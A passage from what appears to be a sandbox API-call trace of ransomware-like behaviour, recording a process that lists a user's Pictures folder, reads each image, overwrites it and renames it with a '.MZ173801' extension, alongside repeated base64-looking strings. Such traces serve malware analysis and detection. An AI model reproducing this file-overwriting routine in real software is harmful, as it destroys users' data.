ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0113.968] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.968] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.968] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c156bf0, ftCreationTime.dwHighDateTime=0x1d5e706, ftLastAccessTime.dwLowDateTime=0xc9e106d0, ftLastAccessTime.dwHighDateTime=0x1d5e24b, ftLastWriteTime.dwLowDateTime=0xc9e106d0, ftLastWriteTime.dwHighDateTime=0x1d5e24b, nFileSizeHigh=0x0, nFileSizeLow=0x1726f, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="EIGtc7lwmfk.png", cAlternateFileName="EIGTC7~1.PNG")) returned 1 [0113.968] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.968] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.969] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\EIGtc7lwmfk.png" (normalized: "c:\\users\\fd1hvy\\pictures\\eigtc7lwmfk.png"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c156bf0, ftCreationTime.dwHighDateTime=0x1d5e706, ftLastAccessTime.dwLowDateTime=0xc9e106d0, ftLastAccessTime.dwHighDateTime=0x1d5e24b, ftLastWriteTime.dwLowDateTime=0xc9e106d0, ftLastWriteTime.dwHighDateTime=0x1d5e24b, nFileSizeHigh=0x0, nFileSizeLow=0x1726f)) returned 1 [0113.969] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.969] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0113.969] GetCurrentThreadId () returned 0x1358 [0113.969] GetCurrentThreadId () returned 0x1358 [0113.969] GetCurrentThreadId () returned 0x1358 [0113.970] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.970] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0113.970] GetCurrentThreadId () returned 0x1358 [0113.970] GetCurrentThreadId () returned 0x1358 [0113.970] GetCurrentThreadId () returned 0x1358 [0113.970] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\EIGtc7lwmfk.png" (normalized: "c:\\users\\fd1hvy\\pictures\\eigtc7lwmfk.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0113.970] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0113.970] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.970] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x1726f [0113.970] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.970] ReadFile (in: hFile=0x3f8, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x1726f, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x1726f, lpOverlapped=0x0) returned 1 [0113.972] CloseHandle (hObject=0x3f8) returned 1 [0113.974] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\EIGtc7lwmfk.png" (normalized: "c:\\users\\fd1hvy\\pictures\\eigtc7lwmfk.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0113.975] WriteFile (in: hFile=0x3f8, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0x1726f, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f9bc*=0x1726f, lpOverlapped=0x0) returned 1 [0114.213] CloseHandle (hObject=0x3f8) returned 1 [0114.216] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\EIGtc7lwmfk.png" (normalized: "c:\\users\\fd1hvy\\pictures\\eigtc7lwmfk.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\EIGtc7lwmfk.png.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\eigtc7lwmfk.png.mz173801")) returned 1 [0114.216] GetCurrentThreadId () returned 0x1358 [0114.216] GetCurrentThreadId () returned 0x1358 [0114.216] GetCurrentThreadId () returned 0x1358 [0114.216] GetCurrentThreadId () returned 0x1358 [0114.216] GetCurrentThreadId () returned 0x1358 [0114.216] GetCurrentThreadId () returned 0x1358 [0114.216] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96957a40, ftCreationTime.dwHighDateTime=0x1d5ef48, ftLastAccessTime.dwLowDateTime=0xc825050, ftLastAccessTime.dwHighDateTime=0x1d5e7a3, ftLastWriteTime.dwLowDateTime=0xc825050, ftLastWriteTime.dwHighDateTime=0x1d5e7a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="F yK2LwO", cAlternateFileName="FYK2LW~1")) returned 1 [0114.216] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10bceec0, ftCreationTime.dwHighDateTime=0x1d5eee0, ftLastAccessTime.dwLowDateTime=0xa35b3250, ftLastAccessTime.dwHighDateTime=0x1d5ebf7, ftLastWriteTime.dwLowDateTime=0xa35b3250, ftLastWriteTime.dwHighDateTime=0x1d5ebf7, nFileSizeHigh=0x0, nFileSizeLow=0x11b28, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="HzRoNmrPEEYbe.jpg", cAlternateFileName="HZRONM~1.JPG")) returned 1 [0114.216] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0114.216] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0114.217] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\HzRoNmrPEEYbe.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\hzronmrpeeybe.jpg"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10bceec0, ftCreationTime.dwHighDateTime=0x1d5eee0, ftLastAccessTime.dwLowDateTime=0xa35b3250, ftLastAccessTime.dwHighDateTime=0x1d5ebf7, ftLastWriteTime.dwLowDateTime=0xa35b3250, ftLastWriteTime.dwHighDateTime=0x1d5ebf7, nFileSizeHigh=0x0, nFileSizeLow=0x11b28)) returned 1 [0114.217] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0114.217] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0114.217] GetCurrentThreadId () returned 0x1358 [0114.217] GetCurrentThreadId () returned 0x1358 [0114.217] GetCurrentThreadId () returned 0x1358 [0114.218] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0114.218] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCR